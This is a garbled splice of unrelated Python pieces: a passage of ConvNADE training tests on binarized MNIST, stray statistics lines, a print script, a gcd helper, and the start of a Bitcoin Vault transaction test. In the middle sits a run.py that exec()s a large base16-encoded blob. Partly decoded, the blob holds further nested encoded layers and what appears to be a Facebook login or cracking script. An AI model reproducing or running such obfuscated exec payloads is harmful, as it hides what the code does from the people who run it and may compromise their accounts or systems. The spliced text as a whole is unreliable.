        assert_array_almost_equal(param1.get_value(), param2.get_value(), err_msg=param1.name)


def test_save_load_convnade():
    nb_kernels = 8
    kernel_shape = (2, 2)
    hidden_activation = "hinge"
    use_mask_as_input = True
    batch_size = 1024
    ordering_seed = 1234
    max_epoch = 5
    nb_orderings = 1

    with Timer("Loading/processing binarized MNIST"):
        trainset, validset, testset = load_binarized_mnist()

        # Extract the center patch (4x4 pixels) of each image.
        indices_to_keep = [348, 349, 350, 351, 376, 377, 378, 379, 404, 405, 406, 407, 432, 433, 434, 435]
        trainset = Dataset(trainset.inputs.get_value()[:, indices_to_keep],
                           trainset.inputs.get_value()[:, indices_to_keep], name="trainset")
        validset = Dataset(validset.inputs.get_value()[:, indices_to_keep],
                           validset.inputs.get_value()[:, indices_to_keep], name="validset")
        testset = Dataset(testset.inputs.get_value()[:, indices_to_keep],
                          testset.inputs.get_value()[:, indices_to_keep], name="testset")

        image_shape = (4, 4)
        nb_channels = 1

    # Nested function to build a trainer.
    def _build_trainer(nb_epochs):
        print("Will train Convolutional Deep NADE for a total of {0} epochs.".format(nb_epochs))

        with Timer("Building model"):
            builder = DeepConvNADEBuilder(image_shape=image_shape,
                                          nb_channels=nb_channels,
                                          use_mask_as_input=use_mask_as_input)

            convnet_blueprint = "64@2x2(valid) -> 1@2x2(full)"
            fullnet_blueprint = "5 -> 16"
            print("Convnet:", convnet_blueprint)
            print("Fullnet:", fullnet_blueprint)
            builder.build_convnet_from_blueprint(convnet_blueprint)
            builder.build_fullnet_from_blueprint(fullnet_blueprint)

            model = builder.build()
            model.initialize(initer.UniformInitializer(random_seed=1234))

        with Timer("Building optimizer"):
            loss = BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, trainset)
            optimizer = SGD(loss=loss)
            optimizer.append_direction_modifier(ConstantLearningRate(0.001))

        with Timer("Building trainer"):
            batch_scheduler = MiniBatchSchedulerWithAutoregressiveMask(trainset, batch_size)
            trainer = Trainer(optimizer, batch_scheduler)

            # Print time for one epoch
            trainer.append_task(tasks.PrintEpochDuration())
            trainer.append_task(tasks.PrintTrainingDuration())

            # Log training error
            loss_monitor = views.MonitorVariable(loss.loss)
            avg_loss = tasks.AveragePerEpoch(loss_monitor)
            accum = tasks.Accumulator(loss_monitor)
            logger = tasks.Logger(loss_monitor, avg_loss)
            trainer.append_task(logger, avg_loss, accum)

            # Print average training loss.
            trainer.append_task(tasks.Print("Avg. training loss: {}", avg_loss))

            # Print NLL mean/stderror.
            nll = views.LossView(loss=BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, validset),
                                 batch_scheduler=MiniBatchSchedulerWithAutoregressiveMask(validset,
                                                                                          batch_size=len(validset),
                                                                                          keep_mask=True))
            trainer.append_task(tasks.Print("Validset - NLL : {0:.2f} ± {1:.2f}", nll.mean, nll.stderror))

            trainer.append_task(stopping_criteria.MaxEpochStopping(nb_epochs))

        return trainer, nll, logger

    trainer1, nll1, logger1 = _build_trainer(nb_epochs=10)
    with Timer("Compiling training graph"):
        trainer1.build_theano_graph()

    with Timer("Training"):
        trainer1.train()

    trainer2a, nll2a, logger2a = _build_trainer(5)
    with Timer("Compiling training graph"):
        trainer2a.build_theano_graph()

    with Timer("Training"):
        trainer2a.train()

    # Save model halfway during training and resume it.
    with tempfile.TemporaryDirectory() as experiment_dir:
        with Timer("Saving"):
            # Save current state of the model (i.e. after 5 epochs).
            trainer2a.save(experiment_dir)

        with Timer("Loading"):
            # Load previous state from which training will resume.
            trainer2b, nll2b, logger2b = _build_trainer(10)
            trainer2b.load(experiment_dir)

        # Check we correctly reloaded the model.
        assert_equal(len(trainer2a._optimizer.loss.model.parameters),
                     len(trainer2b._optimizer.loss.model.parameters))
        for param1, param2 in zip(trainer2a._optimizer.loss.model.parameters,
                                  trainer2b._optimizer.loss.model.parameters):
            assert_array_equal(param1.get_value(), param2.get_value(), err_msg=param1.name)

        with Timer("Compiling training graph"):
            trainer2b.build_theano_graph()

        with Timer("Training"):
            trainer2b.train()

        # Check we correctly resumed training.
        assert_equal(len(trainer1._optimizer.loss.model.parameters),
                     len(trainer2b._optimizer.loss.model.parameters))
        for param1, param2 in zip(trainer1._optimizer.loss.model.parameters,
                                  trainer2b._optimizer.loss.model.parameters):
            # I tested it, they are exactly equal when using float64.
            assert_array_almost_equal(param1.get_value(), param2.get_value(), err_msg=param1.name)

        # I tested it, they are exactly equal when using float64.
        assert_array_almost_equal(nll1.mean.view(trainer1.status), nll2b.mean.view(trainer2b.status))
        assert_array_almost_equal(nll1.stderror.view(trainer1.status), nll2b.stderror.view(trainer2b.status))

        # I tested it, they are exactly equal when using float64.
        assert_array_almost_equal(logger1.get_variable_history(0),
                                  logger2a.get_variable_history(0) + logger2b.get_variable_history(0))
        assert_array_almost_equal(logger1.get_variable_history(1),
                                  logger2a.get_variable_history(1) + logger2b.get_variable_history(1))


def test_new_fprop_matches_old_fprop():
    nb_kernels = 8
    kernel_shape = (2, 2)
    hidden_activation = "sigmoid"
    use_mask_as_input = True
    batch_size = 1024
    ordering_seed = 1234
    max_epoch = 10
    nb_orderings = 1

    print("Will train Convolutional Deep NADE for a total of {0} epochs.".format(max_epoch))

    with Timer("Loading/processing binarized MNIST"):
        trainset, validset, testset = load_binarized_mnist()

        # Extract the center patch (4x4 pixels) of each image.
        indices_to_keep = [348, 349, 350, 351, 376, 377, 378, 379, 404, 405, 406, 407, 432, 433, 434, 435]
        trainset = Dataset(trainset.inputs.get_value()[:, indices_to_keep],
                           trainset.inputs.get_value()[:, indices_to_keep], name="trainset")
        validset = Dataset(validset.inputs.get_value()[:, indices_to_keep],
                           validset.inputs.get_value()[:, indices_to_keep], name="validset")
        testset = Dataset(testset.inputs.get_value()[:, indices_to_keep],
                          testset.inputs.get_value()[:, indices_to_keep], name="testset")

        image_shape = (4, 4)
        nb_channels = 1 + (use_mask_as_input is True)

    with Timer("Building model"):
        builder = DeepConvNADEBuilder(image_shape=image_shape,
                                      nb_channels=nb_channels,
                                      use_mask_as_input=use_mask_as_input)

        convnet_blueprint = "64@2x2(valid) -> 1@2x2(full)"
        fullnet_blueprint = "5 -> 16"
        print("Convnet:", convnet_blueprint)
        print("Fullnet:", fullnet_blueprint)
        builder.build_convnet_from_blueprint(convnet_blueprint)
        builder.build_fullnet_from_blueprint(fullnet_blueprint)

        model = builder.build()
        model.initialize()  # By default, uniform initialization.

    with Timer("Building optimizer"):
        loss = BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, trainset)
        optimizer = SGD(loss=loss)
        optimizer.append_direction_modifier(ConstantLearningRate(0.001))

    with Timer("Building trainer"):
        batch_scheduler = MiniBatchSchedulerWithAutoregressiveMask(trainset, batch_size,
                                                                   use_mask_as_input=use_mask_as_input)
        trainer = Trainer(optimizer, batch_scheduler)

        # Print time for one epoch
        trainer.append_task(tasks.PrintEpochDuration())
        trainer.append_task(tasks.PrintTrainingDuration())

        # Log training error
        loss_monitor = views.MonitorVariable(loss.loss)
        avg_loss = tasks.AveragePerEpoch(loss_monitor)
        accum = tasks.Accumulator(loss_monitor)
        logger = tasks.Logger(loss_monitor, avg_loss)
        trainer.append_task(logger, avg_loss, accum)

        # Print average training loss.
        trainer.append_task(tasks.Print("Avg. training loss: {}", avg_loss))

        trainer.append_task(stopping_criteria.MaxEpochStopping(max_epoch))
        trainer.build_theano_graph()

    with Timer("Training"):
        trainer.train()

    mask_o_lt_d = batch_scheduler._shared_batch_mask
    fprop_output, fprop_pre_output = model.fprop(trainset.inputs, mask_o_lt_d,
                                                 return_output_preactivation=True)
    model_output = model.get_output(T.concatenate([trainset.inputs * mask_o_lt_d, mask_o_lt_d], axis=1))
    assert_array_equal(model_output.eval(), fprop_pre_output.eval())
    print(np.sum(abs(model_output.eval() - fprop_pre_output.eval())))


if __name__ == '__main__':
    # test_simple_convnade()
    # test_convnade_with_mask_as_input_channel()
    # test_convnade_with_max_pooling()
    test_save_load_convnade()
    test_check_init()
    test_new_fprop_matches_old_fprop()
43.434532
159
0.668698
3,551
30,187
5.440158
0.096593
0.018221
0.028264
0.039134
0.878869
0.868361
0.85278
0.841081
0.834403
0.821824
0
0.028509
0.228443
30,187
694
160
43.497118
0.800696
0.090238
0
0.851613
0
0.002151
0.085505
0
0
0
0
0
0.036559
1
0.017204
false
0
0.047312
0
0.068817
0.122581
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
85f9efe21514dd64ed03790486f607a2845a96be
96
py
Python
Class_1/test3.py
travism16/Python-Course
d8c522fc31c7830c3ceabf7a35022a9e33e1d706
[ "Apache-2.0" ]
null
null
null
Class_1/test3.py
travism16/Python-Course
d8c522fc31c7830c3ceabf7a35022a9e33e1d706
[ "Apache-2.0" ]
null
null
null
Class_1/test3.py
travism16/Python-Course
d8c522fc31c7830c3ceabf7a35022a9e33e1d706
[ "Apache-2.0" ]
null
null
null
print("hello") print("hello") print("hello") print("hello") print("It's me") print("I'm here")
12
17
0.635417
16
96
3.8125
0.5
0.655738
0.983607
0.983607
0.737705
0.737705
0.737705
0
0
0
0
0
0.09375
96
7
18
13.714286
0.701149
0
0
0.666667
0
0
0.368421
0
0
0
0
0
0
1
0
true
0
0
0
0
1
1
0
0
null
1
1
1
0
1
1
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
9
c822f3529cdfd4e0b7e4d9887422bf6a6b98c447
92
py
Python
dfs/knapsack/common.py
jgershen/sportsball
8aa2a599091fb14d1897f2e4b77384e9ee6b0eed
[ "MIT" ]
21
2016-03-12T00:59:04.000Z
2022-03-01T21:32:51.000Z
dfs/knapsack/common.py
jgershen/sportsball
8aa2a599091fb14d1897f2e4b77384e9ee6b0eed
[ "MIT" ]
1
2017-04-17T04:39:46.000Z
2017-04-17T04:39:46.000Z
dfs/knapsack/common.py
jgershen/sportsball
8aa2a599091fb14d1897f2e4b77384e9ee6b0eed
[ "MIT" ]
4
2016-07-25T11:55:52.000Z
2019-06-19T20:55:53.000Z
# `fractions.gcd` and the builtin `reduce` are Python 2 era; on Python 3
# the equivalents live in `math` and `functools`.
from math import gcd
from functools import reduce


def get_gcd_cost(costs, cap):
    # Greatest common divisor of all the costs together with the cap.
    return reduce(gcd, costs + [cap])
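An illustrative call with made-up numbers: costs of 300, 450, and 600 under a 1500 cap share a factor of 150, so every reachable total is a multiple of that step.

print(get_gcd_cost([300, 450, 600], 1500))  # -> 150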
23
35
0.73913
15
92
4.4
0.733333
0.242424
0
0
0
0
0
0
0
0
0
0
0.152174
92
4
35
23
0.846154
0
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
7
8d0d9c0bcc9c0425dbb4ee5c1069450d1666fccb
77
py
Python
tests/test_sql_eqs.py
qxiddd/otus-architecture-patterns-2022-02
de49c5953b5e3adbbc2ce8acb497c4903cc2b306
[ "MIT" ]
null
null
null
tests/test_sql_eqs.py
qxiddd/otus-architecture-patterns-2022-02
de49c5953b5e3adbbc2ce8acb497c4903cc2b306
[ "MIT" ]
null
null
null
tests/test_sql_eqs.py
qxiddd/otus-architecture-patterns-2022-02
de49c5953b5e3adbbc2ce8acb497c4903cc2b306
[ "MIT" ]
null
null
null
from sqr_eqs import hello_world


def test_hello():
    assert hello_world()
12.833333
31
0.753247
12
77
4.5
0.75
0.37037
0
0
0
0
0
0
0
0
0
0
0.181818
77
5
32
15.4
0.857143
0
0
0
0
0
0
0
0
0
0
0
0.333333
1
0.333333
true
0
0.333333
0
0.666667
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
7
23b443d7f3cdbcc5cbe2d048b9c746cb0571df53
20,869
py
Python
run.py
silentrader/Aclay_FB
8f3188a017823e295c6154ea913b3fb7e9ce345b
[ "Apache-2.0" ]
null
null
null
run.py
silentrader/Aclay_FB
8f3188a017823e295c6154ea913b3fb7e9ce345b
[ "Apache-2.0" ]
1
2020-05-05T10:06:37.000Z
2020-05-05T10:06:37.000Z
run.py
silentrader/Aclay_FB
8f3188a017823e295c6154ea913b3fb7e9ce345b
[ "Apache-2.0" ]
null
null
null
#Compile By : King Mr_Z17 #My Team. : Vortex Team import base64 exec(base64.b16decode("23436F6D70696C6520427920417269656C2053616E6479205065726D616E610A234D79205465616D203A20426C61636B20436F6465722043727573680A696D706F7274206261736536340A65786563286261736536342E6231366465636F6465282232333433364636443730363936433635323034323739323034313732363936353643323035333631364536343739323035303635373236443631364536313041323334443739323035343635363136443230334132303432364336313633364232303433364636343635373232303433373237353733363830413639364437303646373237343230363236313733363533363334304136353738363536333238363236313733363533363334324536323331333636343635363336463634363532383232333233333332333033323434333234313332343433323330333633333336343633363334333633393336343533363337333334313332333033373335333733343336333633323434333333383332333033323434333234313332343433303431333233333332333033363333333634363336333433363339333634353336333733333434333733353337333433363336333234343333333833303431333633393336343433373330333634363337333233373334333233303337333333363436333633333336343233363335333733343332343333373333333733343337333233373335333633333337333433323433333634363337333333323433333733333337333933373333333234333337333433363339333634343336333533323433333733393336333133363337333634343336333133363339333634333330343133303431333633343336333533363336333233303337333333363433333634363337333733373330333733323336333933363435333733343332333833373333333233393333343133303431333233303332333033323330333233303336333633363436333733323332333033363333333233303336333933363435333233303337333333323330333234323332333033323337333534333336343533323337333334313330343133323330333233303332333033323330333233303332333033323330333233303337333333373339333733333332343533373333333733343336333433363436333733353337333433323435333733373337333233363339333733343336333533323338333633333332333933303431333233303332333033323330333233303332333033323330333233303332333033373333333733393337333333323435333733333337333433363334333634363337333533373334333234353336333633363433333733353337333333363338333233383332333933303431333233303332333033323330333233303332333033323330333233303332333033373334333633393336343433363335333234353337333333363433333633353336333533373330333233383333333033323435333333313332333033323436333233303333333133333330333333303332333933303431333034313336343333363436333633373336343633323330333334343332333033323332333233323332333233353433333733383333333133363332333534323333333333333332333634343330343133303431343533323339333633383334343533323339333633383334343533323339333633383433333233303332333033323330333233303332333033323330333233303332333033323330343533323339333633383334343533323339333633383334333233303435333233383330343133323332333033323330343533323339333633383334343533323339333633383334333233303435333233383330343133323332333034353332333933363338333434353332333933363338333434353332333933363338333433323330333234353435333233393336333833343435333233393336333833343435333233393336333833343332333033323330333034313435333233393336333833383435333233393336333833383435333233383330343133323332333033323330343533323339333634313431333233303332333033323330333233303332333034353332333933363339333034353332333933363338333833323330343533323339333633383330333233303435333233393336343134313435333233393336333933303435333233393336333833383332333034353332333933363338333033323330343533323339333634313431343533323339333633383330343533323339333633383334333234353435333233393336333833303433333234323337343533323339333633383330343533323339333633383334333233303435333233393336
333833383433333234323337333034313435333233393336333833383435333233393336333833383435333233393336343134313332333033323330333233303435333233393336333833343435333233393336333833383435333233393336333833303435333233393336333833343332333034353332333933363338333434353332333933363338333833323330343533323339333633383330343533323339333633383338343533323339333633383334343533323339333633383334343533323339333633383338333233303435333233393336333833303435333233393336333833383435333233393336333833343435333233393336333933303435333233393336333833303435333233393336333833303435333233393336343134313435333233393336333833343435333233393336333933303435333233393336333833303435333233393336333833303435333233393336333833343332333033303431343533323339333633393330343533323339333633383338343533323339333633383433343533323339333633393330343533323339333633383433343533323339333633393330343533323339333633383338343533323339333633383433333234353435333233393336333933303435333233393336333834333435333233393336333933303435333233393336333833383435333233393336333833343435333233393336343134313435333233393336333933303435333233393336333833383435333233393336333933303435333233393336333833383435333233393336333833343435333233393336343134313435333233393336333933303435333233393336333833383435333233393336333933303435333233393336333833383435333233393336333833343435333233393336333833343435333233393336333834333435333233393336333933303435333233393336333833383435333233383330343133323435333233393336333833383435333233393336333834333330343133323435343533323339333633383330343533323339333633383330343533323339333633383330333233303332333034353332333933363338333034353332333933363338333834353332333933363338333434353332333933363338333034353332333933363431343134333332343233373435333233393336333833303435333233393336333833303435333233393336333833303435333233393336333833303332333034333332343233373435333233393336333833303435333233393336333833303435333233393336333833303435333233393336333833303332333033323330343533323339333633383330343533323339333633383330343533323339333633383330333233303332343534353332333933363338333033323330333233303435333233393336333833303332333033353433333733383333333133363332333534323333333333333333333634343334333333353332333433353334333133353334333434363335333233323330333534333337333833333331333633323335343233333330333333303336343433303431333233323332333233323332333034313330343133363334333633353336333633323330333633383336333533363331333633343336333533373332333233383332333933333431333034313330333933363436333733333332343533373333333733393337333333373334333633353336343433323338333233373336333333363433333633353336333133373332333233373332333933303431333033393337333333363433333634363337333733373330333733323336333933363435333733343332333833363433333634363336333733363436333233393330343133303339333733303337333233363339333634353337333433323338333233373334343333363436333633373336333733363335333733323332343433353338333234343334333333373332333633353336333133373334333634363337333233323330333533343336343633363436333634333337333333323330333633323337333933323330333534333337333833333331333633323335343233333333333333363336343433343432333633393336343533363337333233303334343433373332333534363335343133333331333333373332333733323339333034313330333933373330333733323336333933363435333733343332333833323337333534333337333833333331333633323335343233333333333333323336343433333331333234353332333033353433333733383333333133363332333534323333333033333330333634343334333333373332333633353336333133373334333633353332333033343433333634363336333733363337333633353337333233323337333
233393330343133303339333733303337333233363339333634353337333433323338333233373335343333373338333333313336333233353432333333333333333233363434333333323332343533323330333534333337333833333331333633323335343233333330333333303336343433343335333633343336333933373334333233303334343333363436333633373336333733363335333733323332333733323339333034313330333933373330333733323336333933363435333733343332333833323337333534333337333833333331333633323335343233333333333333323336343433333333333234353332333033353433333733383333333133363332333534323333333033333330333634343335333233363335333634343336343633373336333633353332333033343433333633393336333733363337333633353337333233323337333233393330343133303339333733303337333233363339333634353337333433323338333233373335343333373338333333313336333233353432333333333333333233363434333333343332343533323330333534333337333833333331333633323335343233333330333333303336343433353332333633353336333133363334333233303337333333363436333733353337333233363333333633353332333033363333333634363336333433363335333233373332333933303431333033393337333033373332333633393336343533373334333233383332333733353433333733383333333133363332333534323333333333333331333634343333333033323435333233303335343333373338333333313336333233353432333333303333333033363434333433353337333833363339333733343332333733323339333034313330333933373330333733323336333933363435333733343332333833323337333534333337333833333331333633323335343233333330333333303336343433323337333233393330343133303339333634343336333133363339333634353332333833323339333034313330333933303431333633343336333533363336333233303336343433363331333633393336343533323338333233393333343133303431333033393336333433363436333633373333343433363339333634353337333033373335333733343332333833323337333534333337333833333331333633323335343233333330333333303336343433343433333634363336333733363337333633353337333233323434333533383332343433343333333733323336333533363331333733343336343633373332333534333337333833333331333633323335343233333333333333333336343433323330343533323338333934313335333233303335343333373338333333313336333233353432333333333333333233363434333233373332333933303431333033393336333933363336333233303336333433363436333633373332333033333434333334343332333033323337333233373333343133303431333033393330333933373330333733323336333933363435333733343332333833323337333534333337333833333331333633323335343233333330333333303336343433343333333634363336343433363434333633313336343533363334333233303336343533363436333733343332333033363336333634363337333533363435333633343335343333373338333333313336333233353432333333393333333133363434333233313332333733323339333034313330333933303339333634343336333133363339333634353332333833323339333034313330333933363335333634333336333933363336333233303336333433363436333633373332333033333434333334343332333033323337333333313332333733333431333034313330333933303339333733303337333233363339333634353337333433323338333233373332333733323339333034313330333933303339333733303337333233363339333634353337333433323338333233373335343333373338333333313336333233353432333333303333333033363434333533303336343333363335333633313337333333363335333233303336343333363436333633373336333933363435333233303337333733363339333733343336333833323330333433313336333333363333333634363337333533363435333733343332333033343337333634363336343633363337333634333336333533323337333233393330343133303339333033393337333533333434333633393336343533373330333733353337333433323338333233373335343333373338333333313336333233353432333333303333333033363434333433393336343533373330333733353337333433323330333733
393336343633373335333733323332333033373335333733333336333533373332333634353336333133363434333633353333343133323330333534333337333833333331333633323335343233333333333333333336343433323337333233393330343133303339333033393337333033333434333633393336343533373330333733353337333433323338333233373335343333373338333333313336333233353432333333303333333033363434333433393336343533373330333733353337333433323330333733393336343633373335333733323332333033373330333633313337333333373333333733373336343633373332333633343333343133323330333534333337333833333331333633323335343233333333333333333336343433323337333233393330343133303339333033393337333333333434333633393336343533373330333733353337333433323338333233373335343333373338333333313336333233353432333333303333333033363434333433393336343533373330333733353337333433323330333733393336343633373335333733323332333033373333333733353336333233363431333633353336333333373334333233303333343133323330333534333337333833333331333633323335343233333333333333333336343433323337333233393330343133303339333033393337333433333434333633393336343533373330333733353337333433323338333233373335343333373338333333313336333233353432333333303333333033363434333533333336333533363435333633343332333033363434333633313336333933363433333233303337333433363436333233303332333033323330333233303332333033323330333233303333343133323330333534333337333833333331333633323335343233333333333333333336343433323337333233393330343133303339333033393336333233333331333334343332333833323332333233323332333233323337333233323332333233323332333234323337333533323432333233323332333233323332333233373332333233323332333233323332343233323332333233323332333233323433333233323332333233323332333234323332333233323332333233323332333733323332333233323332333233323432333733303332343233323332333233323332333233323337333233323332333233323332333234323332333233323332333233323332333933323332333233323332333233323339333034313330333933303339333633323333333233333434333233383332333233373333333733353336333233363431333633353336333333373334333334343332333233323432333233323332333233323332333233373332333233323332333233323332343233373333333234323332333233323332333233323332333733323332333233323332333233323339333034313330333933303339333733303337333233363339333634353337333433323338333233373335343333373338333333313336333233353432333333333333333333363434333233373332333933303431333033393330333933363332333333333333343433323338333233323332333233323332333233373332333233323332333233323332343233373334333234323332333233323332333233323332333733323332333233323332333233323432333233323332333233323332333234333332333233323332333233323332343233323332333733333337333533363332333634313336333533363333333733343332333233323432333233323332333233323332333234333332333233323332333233323332343233323332333633323336343633363334333733393332333233323432333233323332333233323332333233393332333233323332333233323332333933303431333033393330333933363332333333343333343433323338333233323332333233323339333034313330333933303339333633323333333533333434333233383332333233363434333633313336333933363435333233323332343233323332333233323332333233323338333233323332333233323332333234323332333233323332333233323332333933323332333233323332333233323339333034313330333933303339333733303337333233363339333634353337333433323338333233373334333333373332333633353336333133373334333633393336343533363337333233303336343333363436333633373336333733363335333733323332333033363333333634363336333433363335333234333332333033373330333634333336333533363331333733333336333533323330333733373336333133363339333733343332333033323435333234353
332343533323337333233393330343133303339333033393336343633373333333234353337333333373339333733333337333433363335333634343332333833323337333733333336343333363335333633353337333033323330333333333332333733323339333034313330333933303339333634363337333333323435333733333337333933373333333733343336333533363434333233383332333733363333333633313337333433323330333634333336343633363337333333313332333033333435333233303336343333363436333633373336333733363335333733323332343533373330333733393333343233363335333633333336333833363436333233303332333233323337333234323336333233333331333234323332333733323332333233303333343533333435333233303336343333363436333633373336333733363335333733323332343533373330333733393333343233363335333633333336333833363436333233303332333233323337333234323336333233333332333234323332333733323332333233303333343533333435333233303336343333363436333633373336333733363335333733323332343533373330333733393333343233363333333633313337333433323330333634333336343633363337333333323332333033333435333334353332333033363433333634363336333733363337333633353337333233323435333733303337333933333432333633353336333333363338333634363332333033323332333233373332343233363332333333333332343233323337333233323332333033333435333334353332333033363433333634363336333733363337333633353337333233323435333733303337333933333432333733303337333233363339333634353337333433323330333233323332333733323432333633323333333433323432333233373332333233323330333334353333343533323330333634333336343633363337333633373336333533373332333234353337333033373339333334323337333033373332333633393336343533373334333233303332333233323337333234323336333233333335333234323332333733323332333233303333343533333435333233303336343333363436333633373336333733363335333733323332343533373330333733393333343233363333333633313337333433323330333634333336343633363337333633373336333533373332333234353337333033373339333233303333343533323330333234363337333333363334333633333336333133373332333633343332343633363433333634363336333733363337333633353337333233323435333733303337333933323337333233393330343133303339333033393337333333363433333634363337333733373330333733323336333933363435333733343332333833323337333534333337333833333331333633323335343233333330333333303336343433353333333733353336333333363333333633353337333333373333333234333332333033363336333633393336343333363335333233303336333133373335333733343336343633323330333733333336333133373336333633353336333433323330333633313337333333323330333534333337333833333331333633323335343233333333333333333336343433323436333733333336333433363333333633313337333233363334333234363336343333363436333633373336333733363335333733323332343533373330333733393332333733323339333034313330333933303339333634363337333333323435333733333337333933373333333733343336333533363434333233383332333733373338333633343336333733323434333634363337333033363335333634353332333033363338333733343337333433373330333733333333343133323436333234363336333933363435333733333337333433363331333633373337333233363331333634343332343533363333333634363336343433323436333634323336333933363435333633373336343433373332333534363337343133333331333333373332333733323339333034313330333933363335333634333336333933363336333233303336333433363436333633373332333033333434333334343332333033323337333333323332333733333431333034313330333933303339333634363337333333323435333733333337333933373333333733343336333533363434333233383332333733363435333633313336343533363436333233303336343333363436333633373336333733363335333733323332343533373330333733393332333733323339333034313330333933303339333634343336333133363339333634353332
33383332333933303431333033393336333533363433333633393336333633323330333633343336343633363337333233303333343433333434333233303332333733333333333233373333343133303431333033393330333933363436333733333332343533373333333733393337333333373334333633353336343433323338333233373337333233363434333233303336343333363436333633373336333733363335333733323332343533373330333733393332333733323339333034313330333933303339333733303337333233363339333634353337333433323338333233373335343333373338333333313336333233353432333333303333333033363434333434333336343633363337333633373336333533373332333233303336333833363331333733333332333033363332333633353336333533363435333233303337333233363335333634343336343633373336333633353336333433323330333534333337333833333331333633323335343233333339333333313336343433323331333233373332333933303431333033393330333933363436333733333332343533373333333733393337333333373334333633353336343433323338333233373337333333363433333633353336333533373330333233303333333333323337333233393330343133303339333033393336333833363335333633313336333433363335333733323332333833323339333034313330333933363335333634333336333933363336333233303336333433363436333633373332333033333434333334343332333033323337333333343332333733333431333034313330333933303339333634363337333333323435333733333337333933373333333733343336333533363434333233383332333733363333333633313337333433323330333634333336343633363337333633373336333533373332333234353337333033373339333233373332333933303431333033393330333933363434333633313336333933363435333233383332333933303431333033393336333533363433333633393336333633323330333633343336343633363337333233303333343433333434333233303332333733333330333233373333343133303431333033393330333933363436333733333332343533373333333733393337333333373334333633353336343433323338333233373337333833363334333633373332343433363436333733303336333533363435333233303336333833373334333733343337333033373333333334313332343633323436333733373337333733373337333234353337333933363436333733353337333433373335333633323336333533323435333633333336343633363434333234363336333333363338333633313336343533363435333633353336343333323436333533353334333333363435333433393336343133373335333434343334333433373336333633393334333433363432333633333335343133353436333433353335333833343333333534363336333933343435333633383333333833363337333334363337333333373335333633323335343633363333333634363336343533363336333633393337333233363434333633313337333433363339333634363336343533333434333333313332333733323339333034313330333933363335333634333337333333363335333334313330343133303339333033393337333033373332333633393336343533373334333233383332333733353433333733383333333133363332333534323333333033333330333634343334333333363436333634343336343433363331333634353336333433323330333634353336343633373334333233303336333633363436333733353336343533363334333534333337333833333331333633323335343233333339333333313336343433323330333233313332333133323331333233373332333933303431333033393330333933363434333633313336333933363435333233383332333933303431333034313336333833363335333633313336333433363335333733323332333833323339323232393239222929"))
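The record above decodes a base16 blob and feeds it straight to exec. A safer way to inspect such a payload is to decode it without executing; a sketch, where PAYLOAD stands for the long hex literal above (truncated here to its first bytes):

import base64

PAYLOAD = '23436F6D70696C6520427920'  # illustration only; the real literal is ~20 KB
print(base64.b16decode(PAYLOAD).decode('utf-8', errors='replace'))
# -> '#Compile By '  (the full blob decodes to source that nests another exec/b16decode layer)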
4,173.8
20,800
0.99861
15
20,869
1,389.266667
0.866667
0
0
0
0
0
0
0
0
0
0
0.995684
0.000815
20,869
4
20,801
5,217.25
0.003693
0.002396
0
0
0
0
0.997934
0.997934
0
1
0
0
0
1
0
true
0
0.5
0
0.5
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
1
1
1
0
0
0
0
0
1
1
null
1
0
0
0
0
0
1
0
1
0
0
0
0
12
23ca20dab8d9a64a4bda0b8b3e781719ce04860b
20,316
py
Python
tests/test_vault_transactions.py
erik-svensson/electrumx-royale
7ba069dd9f7e8662ea50db4371a260b879a3e106
[ "MIT" ]
1
2020-12-03T12:29:31.000Z
2020-12-03T12:29:31.000Z
tests/test_vault_transactions.py
erik-svensson/electrumx-royale
7ba069dd9f7e8662ea50db4371a260b879a3e106
[ "MIT" ]
null
null
null
tests/test_vault_transactions.py
erik-svensson/electrumx-royale
7ba069dd9f7e8662ea50db4371a260b879a3e106
[ "MIT" ]
1
2020-05-10T11:04:07.000Z
2020-05-10T11:04:07.000Z
from unittest import TestCase

from electrumx.lib.coins import BitcoinVault, BitcoinVaultRegTest
from electrumx.lib.tx import TxVaultSegWit, VaultTxType, TxVault

HEADER = '010000306f57135f397d1facbc477132637b30066503e0b52d5cffa4d471eddcfb72e53ebd64eb755882f0a40cc90aa9adae819b5efb95d682f45a6d4d36cd89bc407188737a055fffff7f2000000000'
TX_SEGWIT = '020000000001010000000000000000000000000000000000000000000000000000000000000000ffffffff26021202203b33883f0610c368bdc263c91e5e14a50a778281624b87d4ef20e9094c44a3c00101ffffffff0200cf14130400000017a9147687c336a779ae92ca3d8c8455333478b4ad2aa8870000000000000000266a24aa21a9ed212f072e2d2b9cfc89c8ee3b352b1ac31f596f2baa3092c752875e1c9ede230f0120000000000000000000000000000000000000000000000000000000000000000000000000'
AR_ALERT_SEGWIT = '02000000000101229d36ad2ef39155145bf8a3e5f3416c7ca415ff15887aba6212e41e3c82a54700000000232200209f730fc44efad2ef3d4a38aebed0e0e1c2408f93409540496bc5f5b738ee04e0ffffffff01c08c05130400000017a914a813fae80f93e582122732dce4c3148cacec0dba87040047304402205f9bf6d4c4ed13f43310966d2f9b869439a9fd760399b35fbf923036333f8cfc02200bc87f2ed7297127a76b4d6288af9b5db78821a31c7c5cbe6057f17dc56b30c90101014b63516752682103ef6df4b3e7e0a94ef61c3571ee953574c851959350e4befddd3ccf3f5f8539342102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c52ae00000000'
